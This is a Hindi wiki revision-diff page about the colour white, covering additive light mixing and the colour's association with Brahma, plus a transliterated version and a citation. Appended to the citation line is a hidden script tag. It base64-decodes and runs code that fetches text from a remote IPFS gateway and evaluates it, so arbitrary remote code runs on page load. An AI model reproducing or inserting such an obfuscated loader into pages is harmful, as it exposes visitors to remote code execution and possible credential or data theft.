Difference between revisions of "सफ़ेद रंग"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
सफेद [[रंग]] [[प्रकाश]] के सभी रंगों को मिलाने पर बनता है। सफेद रंग तकनीकी दृष्टि से कोई रंग नहीं है। सफेद रंग का प्रभाव [[प्राथमिक रंग|प्राथमिक रंगों]] को उचित राशियों में मिलाने से होता है। इस प्रक्रिया को संयोजी मिश्रण कहा जाता है।
+
*[[रंग|रंगो]] का हमारे जीवन में बहुत महत्व है। रंगो से हमें विभिन्न स्थितियों का पता चलता है। हम अपने चारों तरफ अनेक प्रकार के रंगो से प्रभावित होते है। रंग, मानवी आँखों के [[वर्णक्रम]] से मिलने पर छाया सम्बंधी गतिविधियों से उत्पन्न होते हैं।
 +
*सफेद [[रंग]] [[प्रकाश]] के सभी रंगों को मिलाने पर बनता है। सफेद रंग तकनीकी दृष्टि से कोई रंग नहीं है। सफेद रंग का प्रभाव [[प्राथमिक रंग|प्राथमिक रंगों]] को उचित राशियों में मिलाने से होता है। इस प्रक्रिया को संयोजी मिश्रण कहा जाता है।
 
==धार्मिक मान्यता==
 
==धार्मिक मान्यता==
 
[[ब्रह्मा]] जी को सफेद रंग प्रिय है। ब्रह्मा जी सफेद वस्त्र धारण करते है, जो इस बात को प्रमाणित करते हैं कि ब्रह्म, यानी ईश्वर सभी लोगों के प्रति समान भाव रखते हैं। वे किसी के साथ पक्षपात नहीं करते हैं। सफेद रंग पारदर्शिता और कोमलता का भी प्रतीक है।<ref>{{cite web |url=http://in.jagran.yahoo.com/dharm/?page=article&articleid=4735&category=10 |title=देवताओं के प्रिय रंग |accessmonthday= 17|accessyear= अगस्त|authorlink= |last=जिंदल |first=मीता |format= |publisher=जागरण याहू इंडिया|language=}}</ref>
 
[[ब्रह्मा]] जी को सफेद रंग प्रिय है। ब्रह्मा जी सफेद वस्त्र धारण करते है, जो इस बात को प्रमाणित करते हैं कि ब्रह्म, यानी ईश्वर सभी लोगों के प्रति समान भाव रखते हैं। वे किसी के साथ पक्षपात नहीं करते हैं। सफेद रंग पारदर्शिता और कोमलता का भी प्रतीक है।<ref>{{cite web |url=http://in.jagran.yahoo.com/dharm/?page=article&articleid=4735&category=10 |title=देवताओं के प्रिय रंग |accessmonthday= 17|accessyear= अगस्त|authorlink= |last=जिंदल |first=मीता |format= |publisher=जागरण याहू इंडिया|language=}}</ref>

Revision as of 11:17, 27 September 2010

  • rango ka hamare jivan mean bahut mahatv hai. rango se hamean vibhinn sthitiyoan ka pata chalata hai. ham apane charoan taraph anek prakar ke rango se prabhavit hote hai. rang, manavi aankhoan ke varnakram se milane par chhaya sambandhi gatividhiyoan se utpann hote haian.
  • saphed rang prakash ke sabhi rangoan ko milane par banata hai. saphed rang takaniki drishti se koee rang nahian hai. saphed rang ka prabhav prathamik rangoan ko uchit rashiyoan mean milane se hota hai. is prakriya ko sanyoji mishran kaha jata hai.

dharmik manyata

brahma ji ko saphed rang priy hai. brahma ji saphed vastr dharan karate hai, jo is bat ko pramanit karate haian ki brahm, yani eeshvar sabhi logoan ke prati saman bhav rakhate haian. ve kisi ke sath pakshapat nahian karate haian. saphed rang paradarshita aur komalata ka bhi pratik hai.[1]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. jiandal, mita. devataoan ke priy rang jagaran yahoo iandiya. abhigaman tithi: 17, agast.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh